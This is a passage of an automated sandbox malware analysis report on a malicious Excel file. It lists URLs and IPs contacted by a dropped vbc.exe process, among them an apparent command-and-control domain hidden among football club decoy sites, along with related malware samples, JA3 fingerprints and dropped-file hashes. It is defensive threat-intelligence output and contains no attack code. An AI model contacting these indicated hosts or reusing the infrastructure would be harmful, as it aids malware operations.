https://tribus-watches.com/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.liverpoolfc.com/legal/privacy-policy	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://ocsp.sca1b.amazontrust.com06	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.liverpoolfc.com/legal/terms-and-conditions	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/7020__5774__going_up_62_web.jpg	vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.liverpoolfc.com/history/hillsborough	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.twitter.com/realmadrid	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/AjaxLoader-298x179.gif	vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
https://www.axa.com/?utm_source=liverpoolfc&utm_medium=logo-partnership&utm_campaign=lfc1819	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.chelseafc.com	vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	false		high
https://www.liverpoolfc.com	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://crl.rootg2.amazontrust.com/rootg2.crl0	vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2382338681.00000000051F0000.00000002.00000001.sdmp, explorer.exe, 0000000D.00000002.2376706844.0000000001C70000.00000002.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/5669__6385__plrs_main_plasma.jpg	vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
http://o.ss2.us/0	vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.manutd.comP	vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.liverpoolfc.com/accessible/accessible	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://schema.org/Organization	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.mancity.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.mancity.com	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://www.manutd.com/en/Partners/Global/Visit-Malta	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://www.nike.com/gb/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	false		high
https://www.hcltech.com/unitedbyhcl	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
http://0k10dk21kkeok2e.online	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.verbier.ch/en/index.htm?reset=1	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.liverpoolfc.com/legal/cookies	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.js	vbc.exe, 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.manutd.com/en/Help/Accessibility	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://www.tourism-mauritius.mu	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.youtube.com/manutd	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.realmadrid.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
http://www.liverpoolfc.com/corporate/rss-feeds	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/18/thumb_117132_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://crt.rootg2.amazontrust.com/rootg2.cer0=	vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.mancity.comP	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/home-scripts.min.js	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.liverpoolfc.com/corporate/anti-slavery	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.realmadrid.com/fr	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://instagram.com/manchesterunited	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://sdk.privacy-center.org/loader.js	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/8888__9977__sheff_utd_(a).jpg	vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
https://www.manutd.com/en/partners/global/swissquote	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://www.manutd.com/en/Help/Privacy-Policy	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
http://0k10dk21kkeok2e.online/base/80715A1271D5E2B9CFA3628555538742.htmlKJHpWJXMGDGMCFiCJFToiVmpLqxO	vbc.exe, 00000004.00000000.2162389108.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2201944869.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2202502603.0000000000152000.00000020.00020000.sdmp, vbc.exe, 0000000A.00000000.2202973953.0000000000152000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.manutd.com/en/partners/global/marriott-hotels	vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	false		high
https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/4793__1794__my_liverpool_titles_saint.jpg	vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	false		high
https://uk.joiebaby.com/liverpoolfc/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.liverpoolfc.com/corporate/browser-support	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.2.133	unknown	United States	54113	FASTLYUS	false
104.21.59.148	unknown	United States	13335	CLOUDFLARENETUS	false
99.86.159.34	unknown	United States	16509	AMAZON-02US	false
23.227.38.74	unknown	Canada	13335	CLOUDFLARENETUS	true
99.86.159.103	unknown	United States	16509	AMAZON-02US	false
97.107.138.110	unknown	United States	63949	LINODE-APLinodeLLCUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	361319
Start date:	02.03.2021
Start time:	20:22:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Doc7656.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@17/21@23/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.5% (good quality ratio 24.5%) Quality average: 70.5% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 89 Number of non-executed functions: 21
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 8.241.122.126, 8.248.119.254, 8.253.95.249, 67.27.235.126, 67.26.83.254, 2.20.142.210, 2.20.142.209, 23.201.251.203, 104.22.6.79, 104.22.7.79, 172.67.24.199, 104.108.45.128 Excluded domains from analysis (whitelisted): e13832.b.akamaiedge.net, au.download.windowsupdate.com.edgesuite.net, www.mancity.com.cdn.cloudflare.net, www.manutd.com.edgekey.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, realmadrid.edgekey.net, e14202.g.akamaiedge.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:23:13	API Interceptor	51x Sleep call for process: EQNEDT32.EXE modified
20:23:16	API Interceptor	202x Sleep call for process: vbc.exe modified
20:23:51	API Interceptor	216x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
151.101.2.133	Zahlungskopie.exe	Get hash	malicious	Browse	www.chelseafc.com/
	Purchase Order.exe	Get hash	malicious	Browse	www.chelseafc.com/
	Reversing Purchase Orders.exe	Get hash	malicious	Browse	www.chelseafc.com/
	Purchase Order 267282.exe	Get hash	malicious	Browse	www.chelseafc.com/
	RFQ_397568464846568465467384638364834,pdf.exe	Get hash	malicious	Browse	www.chelseafc.com/
	G.I gratings-pdf.exe	Get hash	malicious	Browse	www.chelseafc.com/
	REQUEST FOR QUOTATION DOCUNMET.exe	Get hash	malicious	Browse	www.chelseafc.com/
	NEW ORDERS 122020 2 x 40 HQ.exe	Get hash	malicious	Browse	www.chelseafc.com/
	vzoWnmtGk0.exe	Get hash	malicious	Browse	www.chelseafc.com/
	enquries.pdf.exe	Get hash	malicious	Browse	www.chelseafc.com/base/dOVkcmMWSJnEtaXdENzqlBWragOdo.html
	_swft01032021.doc	Get hash	malicious	Browse	www.chelseafc.com/
	SHIPMENT DOCUMENT.exe	Get hash	malicious	Browse	www.chelseafc.com/
	ORDER01032021rfggfscan.exe	Get hash	malicious	Browse	www.chelseafc.com/
	AkbankSubeMevduatEkstre.pdf.exe	Get hash	malicious	Browse	www.chelseafc.com/
	http://resources.digital-cloud.medallia.ca	Get hash	malicious	Browse	resources.digital-cloud.medallia.ca/
	http://lassertoolersa.tk	Get hash	malicious	Browse	secure2.alphassl.com/cacert/gsalphasha2g2r1.crt
	https://tedia.com/laboratory/global-research-part1/feature-article-73/index.html	Get hash	malicious	Browse	secure2.alphassl.com/cacert/gsalphasha2g2r1.crt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
0k10dk21kkeok2e.online	Zahlungskopie.exe	Get hash	malicious	Browse	104.21.59.148
	Purchase Order.exe	Get hash	malicious	Browse	104.21.59.148
	Reversing Purchase Orders.exe	Get hash	malicious	Browse	172.67.179.188
	Purchase Order 267282.exe	Get hash	malicious	Browse	172.67.179.188
	G.I gratings-pdf.exe	Get hash	malicious	Browse	172.67.179.188
	REQUEST FOR QUOTATION DOCUNMET.exe	Get hash	malicious	Browse	172.67.179.188
	NEW ORDERS 122020 2 x 40 HQ.exe	Get hash	malicious	Browse	172.67.179.188
d2hhwit6pbhmvu.cloudfront.net	Zahlungskopie.exe	Get hash	malicious	Browse	99.86.159.29
	Purchase Order.exe	Get hash	malicious	Browse	99.86.159.29
	Reversing Purchase Orders.exe	Get hash	malicious	Browse	13.225.74.67
	Purchase Order 267282.exe	Get hash	malicious	Browse	13.225.74.106
	G.I gratings-pdf.exe	Get hash	malicious	Browse	13.225.74.20
	REQUEST FOR QUOTATION DOCUNMET.exe	Get hash	malicious	Browse	13.225.74.67
	NEW ORDERS 122020 2 x 40 HQ.exe	Get hash	malicious	Browse	13.225.80.39
	enquries.pdf.exe	Get hash	malicious	Browse	99.86.159.29
	SHIPMENT DOCUMENT.exe	Get hash	malicious	Browse	99.86.159.34
	ORDER01032021rfggfscan.exe	Get hash	malicious	Browse	13.225.78.71
	AkbankSubeMevduatEkstre.pdf.exe	Get hash	malicious	Browse	13.225.78.73
chelseafc.map.fastly.net	Zahlungskopie.exe	Get hash	malicious	Browse	151.101.2.133
	Purchase Order.exe	Get hash	malicious	Browse	151.101.2.133
	Reversing Purchase Orders.exe	Get hash	malicious	Browse	151.101.2.133
	Purchase Order 267282.exe	Get hash	malicious	Browse	151.101.2.133
	RFQ_397568464846568465467384638364834,pdf.exe	Get hash	malicious	Browse	151.101.2.133
	G.I gratings-pdf.exe	Get hash	malicious	Browse	151.101.2.133
	REQUEST FOR QUOTATION DOCUNMET.exe	Get hash	malicious	Browse	151.101.2.133
	NEW ORDERS 122020 2 x 40 HQ.exe	Get hash	malicious	Browse	151.101.2.133
	vzoWnmtGk0.exe	Get hash	malicious	Browse	151.101.2.133
	enquries.pdf.exe	Get hash	malicious	Browse	151.101.2.133
	_swft01032021.doc	Get hash	malicious	Browse	151.101.2.133
	SHIPMENT DOCUMENT.exe	Get hash	malicious	Browse	151.101.2.133
	ORDER01032021rfggfscan.exe	Get hash	malicious	Browse	151.101.2.133
	AkbankSubeMevduatEkstre.pdf.exe	Get hash	malicious	Browse	151.101.2.133
shops.myshopify.com	orDEANQA70mnjpD.exe	Get hash	malicious	Browse	23.227.38.74
	Order 1759-pdf.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ 204871 AGC_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	po.exe	Get hash	malicious	Browse	23.227.38.74
	PO_210301.exe.exe	Get hash	malicious	Browse	23.227.38.74
	Remittance Advice.xlsx	Get hash	malicious	Browse	23.227.38.74
	RPI_Scanned_30957.doc	Get hash	malicious	Browse	23.227.38.74
	payment slip_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	aQnaI0DXH8l8WfB.exe	Get hash	malicious	Browse	23.227.38.74
	LElwKuxT4D.exe	Get hash	malicious	Browse	23.227.38.74
	remittanceslip_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	dwg.exe	Get hash	malicious	Browse	23.227.38.74
	RQP_10378065.exe	Get hash	malicious	Browse	23.227.38.74
	9VZe9OnL4V.exe	Get hash	malicious	Browse	23.227.38.74
	transferir copia_98087.exe	Get hash	malicious	Browse	23.227.38.74
	0O9BJfVJi6fEMoS.exe	Get hash	malicious	Browse	23.227.38.74
	4pFzkB6ePK.exe	Get hash	malicious	Browse	23.227.38.74
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	23.227.38.74
	ORDER LIST.xlsx	Get hash	malicious	Browse	23.227.38.74
	PO_210222.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FASTLYUS	771eb3ef5ede516d6ec53ae40b3f888f.exe	Get hash	malicious	Browse	185.199.110.133
	Zahlungskopie.exe	Get hash	malicious	Browse	151.101.2.133
	Purchase Order.exe	Get hash	malicious	Browse	151.101.2.133
	SecuriteInfo.com.Trojan.Trickpak8.122C7TFE.19056.dll	Get hash	malicious	Browse	151.101.1.44
	BraveBrowserSetup.exe	Get hash	malicious	Browse	151.101.2.110
	h0SIClAW7f.dll	Get hash	malicious	Browse	151.101.1.44
	SPOILER_YESITS.exe	Get hash	malicious	Browse	185.199.111.133
	SecuriteInfo.com.Variant.Razy.848795.31184.dll	Get hash	malicious	Browse	151.101.1.44
	index_2021-03-02-12_11.dll	Get hash	malicious	Browse	151.101.1.44
	603e0ffd2eeb9.tar.dll	Get hash	malicious	Browse	151.101.1.44
	X7wAKzHEWd.exe	Get hash	malicious	Browse	185.199.108.133
	Reversing Purchase Orders.exe	Get hash	malicious	Browse	151.101.2.133
	mon94.dll	Get hash	malicious	Browse	151.101.1.44
	Purchase Order 267282.exe	Get hash	malicious	Browse	151.101.2.133
	contatti.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	RFQ_397568464846568465467384638364834,pdf.exe	Get hash	malicious	Browse	151.101.2.133
	deli.png.dll	Get hash	malicious	Browse	151.101.1.44
	G.I gratings-pdf.exe	Get hash	malicious	Browse	151.101.2.133
	6Sd99kYOfj.dll	Get hash	malicious	Browse	151.101.1.44
	REQUEST FOR QUOTATION DOCUNMET.exe	Get hash	malicious	Browse	151.101.2.133
AMAZON-02US	Zahlungskopie.exe	Get hash	malicious	Browse	99.86.159.34
	Purchase Order.exe	Get hash	malicious	Browse	99.86.159.29
	BraveBrowserSetup.exe	Get hash	malicious	Browse	99.86.159.34
	REF221.exe	Get hash	malicious	Browse	13.52.90.227
	lPxdChtp3zx86	Get hash	malicious	Browse	52.47.87.178
	UPS Delivery Notification, Receiver susiej@johnstoncompanies.com.html	Get hash	malicious	Browse	52.218.184.40
	Cancellation_Letter_1447980759-02242021.xls	Get hash	malicious	Browse	65.1.5.41
	Cancellation_Letter_1447980759-02242021.xls	Get hash	malicious	Browse	65.1.5.41
	SecuriteInfo.com.Variant.Razy.848795.31184.dll	Get hash	malicious	Browse	3.200.26.246
	Reversing Purchase Orders.exe	Get hash	malicious	Browse	13.225.74.67
	DRAFT SHIPPING DOCUMENTS.xlsx	Get hash	malicious	Browse	54.183.132.164
	ord.xlsx	Get hash	malicious	Browse	54.67.120.65
	Purchase Order 267282.exe	Get hash	malicious	Browse	13.225.74.67
	PO 67915.xlsx	Get hash	malicious	Browse	54.67.120.65
	outstanding SOA367 9908.xlsx	Get hash	malicious	Browse	54.183.131.91
	INV_EASTERN AMAZON_004.xlsx	Get hash	malicious	Browse	54.183.130.144
	REENVIAR ORDEN FIRMADA Y FACTURA.doc	Get hash	malicious	Browse	52.216.144.163
	RFQ 204871 AGC_pdf.exe	Get hash	malicious	Browse	52.41.106.131
	contatti.jpg.dll	Get hash	malicious	Browse	13.224.194.127
	deli.png.dll	Get hash	malicious	Browse	13.224.194.48
CLOUDFLARENETUS	Zahlungskopie.exe	Get hash	malicious	Browse	104.21.59.148
	GA4tAAZfDO.exe	Get hash	malicious	Browse	162.159.135.233
	Purchase Order.exe	Get hash	malicious	Browse	104.21.59.148
	SecuriteInfo.com.Trojan.Trickpak8.122C7TFE.19056.dll	Get hash	malicious	Browse	104.20.185.68
	Invoice-ID419245113015910.vbs	Get hash	malicious	Browse	162.159.134.233
	h0SIClAW7f.dll	Get hash	malicious	Browse	104.20.184.68
	Purchase Order.exe	Get hash	malicious	Browse	172.67.188.154
	GC0PlOHa9h.exe	Get hash	malicious	Browse	162.159.129.233
	holla.htm	Get hash	malicious	Browse	104.16.18.94
	orDEANQA70mnjpD.exe	Get hash	malicious	Browse	23.227.38.74
	UPS Delivery Notification, Receiver susiej@johnstoncompanies.com.html	Get hash	malicious	Browse	172.67.141.111
	SecuriteInfo.com.Variant.Razy.848755.27158.exe	Get hash	malicious	Browse	162.159.135.233
	nqljf9D3k7.exe	Get hash	malicious	Browse	104.23.98.190
	ALEKO GROUP RUSSIA - PURCHASE ORDER# 6101965.EXE	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Variant.Razy.848795.31184.dll	Get hash	malicious	Browse	104.20.184.68
	WaybillDoc_2396752890.pdf.exe	Get hash	malicious	Browse	104.21.19.200
	Tips Ref [MT103].exe	Get hash	malicious	Browse	104.21.19.200
	index_2021-03-02-12_11.dll	Get hash	malicious	Browse	104.20.184.68
	Order List & Images.exe	Get hash	malicious	Browse	104.21.19.200
	Original Invoice.exe	Get hash	malicious	Browse	172.67.188.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Payment Advice PDF.ppt	Get hash	malicious	Browse	99.86.159.103
	Upload_1624615171_1216115197.xls	Get hash	malicious	Browse	99.86.159.103
	Upload_1672782307_1135693836.xls	Get hash	malicious	Browse	99.86.159.103
	Contract document.ppt	Get hash	malicious	Browse	99.86.159.103
	t_DMD5VX.doc	Get hash	malicious	Browse	99.86.159.103
	New Orders PDF.pps	Get hash	malicious	Browse	99.86.159.103
	New Purchase Order.xls	Get hash	malicious	Browse	99.86.159.103
	4C7DFtyfcr.xls	Get hash	malicious	Browse	99.86.159.103
	PJFhdkXx4S.xls	Get hash	malicious	Browse	99.86.159.103
	uwmjkgExOH.xls	Get hash	malicious	Browse	99.86.159.103
	document-783572953.xls	Get hash	malicious	Browse	99.86.159.103
	Att_432126117_2131008625.xls	Get hash	malicious	Browse	99.86.159.103
	PO#00187.ppt	Get hash	malicious	Browse	99.86.159.103
	document-9725971.xls	Get hash	malicious	Browse	99.86.159.103
	7mn2CWSogl.doc	Get hash	malicious	Browse	99.86.159.103
	6xm3a7oyWB.doc	Get hash	malicious	Browse	99.86.159.103
	Xojlq3Pjho.doc	Get hash	malicious	Browse	99.86.159.103
	document-197066197.xls	Get hash	malicious	Browse	99.86.159.103
	Ew982655.docm	Get hash	malicious	Browse	99.86.159.103
	Ew982655.docm	Get hash	malicious	Browse	99.86.159.103
7dcce5b76c8b17472d024758970a406b	ORDER_2020_54.xlsx	Get hash	malicious	Browse	97.107.138.110
	Cancellation_Letter_1447980759-02242021.xls	Get hash	malicious	Browse	97.107.138.110
	Payment Advice PDF.ppt	Get hash	malicious	Browse	97.107.138.110
	Payment Advice PDF.ppt	Get hash	malicious	Browse	97.107.138.110
	interessat_792258.doc	Get hash	malicious	Browse	97.107.138.110
	frui_8943836.doc	Get hash	malicious	Browse	97.107.138.110
	intere_3867448.doc	Get hash	malicious	Browse	97.107.138.110
	interessat_792258.doc	Get hash	malicious	Browse	97.107.138.110
	frui_8943836.doc	Get hash	malicious	Browse	97.107.138.110
	intere_3867448.doc	Get hash	malicious	Browse	97.107.138.110
	contributive_5976013.doc	Get hash	malicious	Browse	97.107.138.110
	tipologi_7517732.doc	Get hash	malicious	Browse	97.107.138.110
	tip_88896.doc	Get hash	malicious	Browse	97.107.138.110
	contributive_5976013.doc	Get hash	malicious	Browse	97.107.138.110
	tipologi_7517732.doc	Get hash	malicious	Browse	97.107.138.110
	tip_88896.doc	Get hash	malicious	Browse	97.107.138.110
	dettagl_2929309.doc	Get hash	malicious	Browse	97.107.138.110
	notif_4845296.doc	Get hash	malicious	Browse	97.107.138.110
	dettagl_2929309.doc	Get hash	malicious	Browse	97.107.138.110
	notif_4845296.doc	Get hash	malicious	Browse	97.107.138.110

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0908522464605643
Encrypted:	false
SSDEEP:	6:kKRHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:w3kPlE99SNxAhUeo+aKt
MD5:	F8C917F4183B020BE6E64B502B3C551C
SHA1:	0990730F2905520414DE582AEDFC390FCEF7EF32
SHA-256:	50CADA7E2FA3AB12B58186E3607D3B66AD87B991240D745A202B108697932648
SHA-512:	D7DB6F4006390E6DDB9A96C74AA0523C6539B0390AF60FBC2D38D5969AF97EBF7F98E4B0E02C1C1FE1C314879223EC2086BF3518F5D01F97A9617A4CE7A1C2B2
Malicious:	false
Reputation:	low
